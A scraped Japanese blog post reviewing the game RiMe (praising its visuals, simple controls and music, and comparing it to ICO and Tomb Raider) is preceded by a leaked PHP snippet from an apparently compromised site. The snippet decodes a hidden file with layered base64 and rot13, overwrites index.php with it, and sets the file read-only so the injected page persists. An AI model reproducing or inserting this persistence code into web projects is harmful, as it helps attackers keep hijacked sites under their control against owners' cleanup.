$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } 【レビュー】RiMe | N-With-game/エヌウィズゲーム
おすすめの他サイト記事一覧

【レビュー】RiMe

2019年4月11日

今回レビューするのは「RiMe」

たまたまSteamのセールで見つけた作品です。

 

一切、前情報も持たず、いきなりのプレイでしたが、

これが思った以上にというかビックリするほど面白かったので

少しでもその魅力が伝わればと思います。

 

 

・美しい世界

Steamのスクリーンショット画像などで何となくは作品の雰囲気は見ていましたが、

実際に始まってみるとその美しいBGMと相まってすぐにその世界観に引き込まれました。

操作している画面には一切アイテムなどの表示はありません。

このへんは「ICO」などに似ていると思いました。

 

 

(画面右下に動画録画用ソフトのロゴがはいっています。この辺は改善していきます)

 

何となく小さい頃にみていた「未来少年コナン」のような世界感で

ジブリアニメのような綺麗な世界を歩いているような感覚に…。

 

・操作はシンプル

主人公の少年は泳いだり、壁を登ったり、ジャンプしたり

アクションは多彩ですが、その操作はシンプル。

難しい操作は求められませんでしたので(少なくとも序盤は)

忙しい操作が苦手でも大丈夫かと思います。



・まとめ

今回は序盤の1時間ほどのみプレイしてのレビューです。

パッと見「ICO」ですが、その内容はどちらかというと

「トゥームレイダー」的な感じでした。

 

トゥームレイダーシリーズの冒険感も大好きですが、

世界観は「RiMe」の方が好きかも。

あと、BGMは驚くほどよかったです。

 

時間がなく、1時間ほどのプレイとなってしまいましたが

また、空いた時間に進めていくようにします!